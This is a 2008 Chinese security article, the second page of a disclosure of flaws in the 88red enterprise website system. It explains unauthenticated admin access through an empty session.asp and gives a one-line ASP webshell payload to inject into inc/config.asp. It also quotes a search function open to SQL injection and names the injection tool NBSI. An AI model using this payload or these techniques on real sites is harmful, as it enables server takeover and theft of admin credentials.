揭露88red生成htm静态页面企业建站系统漏洞第2/2页
更新时间:2008年05月09日 13:28:34 作者:
88red生成htm静态页面企业建站系统后门利用代码,用88red做企业占的朋友可要注意了
很熟悉的,就是inc/config.asp里的,我们可以在这写一句话入库,当然如果有的系统抄袭88red,并且对留言进行过滤的话,我们在这个配置信息里写入“”%><%execute request(“IloveHackerNoteBook”)%>'”然后就会把后面的东西全部“格式化”,最后留下了一句“<%execute request(“******”)%>”这样的话,我们就连接/inc/config.asp或得webshell吧。呵呵,这些都是无稽之谈,因为我说这些是建立在没有密码进去的时候,没钥匙你怎么进去偷钱?(破比方,见笑!)那我们看看,这个屋子的主人是怎么验证你是他的亲戚的?看文件头有个session.asp,想必就是验证“血缘”关系的东西了。嘿嘿,是朋友是敌人,看这个文件,没这个文件谁都能进后台了,大吃一惊的是……session.asp竟然为空。我不知道这个系统的作者是怎么写的,那么要紧的文件吖!!!!好了好了,人家的门没有上锁,进去吧。如图4

撬锁工具,也没强迫屋主,就这样进了他的房间(大家千万别真和我学着去偷钱拉!)这个比喻只是想让大家形象点的了解验证是非常严肃的问题。我们可以直接上网站去修改东西也能在本地提交修改,全部都是ok的,我们来测试一下,如图5

我们先未授权来到信息参数设置,然后用一句话盖掉当前“”%><%execute request(“IloveHackerNoteBook”)%>'”,结果如图6

很成功的插进了一句话,接着就让大家把服务器拿下来吧!3、搜索注入搜索注入,这个系统估计是那些刚会程序的人写的,新的版本,真正靠自己的实力写的代码,过滤不严也不能利马责怪人家,可能下一个版本会不错,但是注入仍然存在,这个是事实,我们来看看这个事实的片断代码:
<% word=request("keyword") ‘客户端获取关键词,注意没过滤啊! if word="" then ‘还不能是空的 response.write"<script language=javascript>alert('关键字不能为空');this.location.href='javascript:history.go(-1)';</script>" response.end end if set rs=server.createobject("adodb.recordset") sql="select * from news where title like '%"&word"%' order by id desc" rs.open sql,conn,1,1 ‘关键词不为空,就能搜索了。 if rs.eof then response.write"<br><br><div align=center>没有搜索到新闻</div><br><br>" else%>
对于搜索型注入大家可以使用NBSI等牛人编写的工具注入,结果如图7

系统,这样猜解到了账号和密码就能去后台登陆了,虽然后台没验证。小小的总结一下:这个系统虽然发布后有点火,我们也该让程序高兴是吧!鼓励是种动力,否则我们小菜读什么代码呢?!总的来说,这个系统最严重的就是session.asp这个文件为空导致整个站不安全的。还有搜索型注入没过滤好,导致攻击者能任意获取账号和密码从而威胁到网站的安全,还有,数据库既然设置成了asa就得加个什么干扰的2进制数据库进去,加载个nodown表,防止一句话如库。我不上论坛,但我有博客:www.xshacker.com.cn,欢迎大家和我交流.


最新评论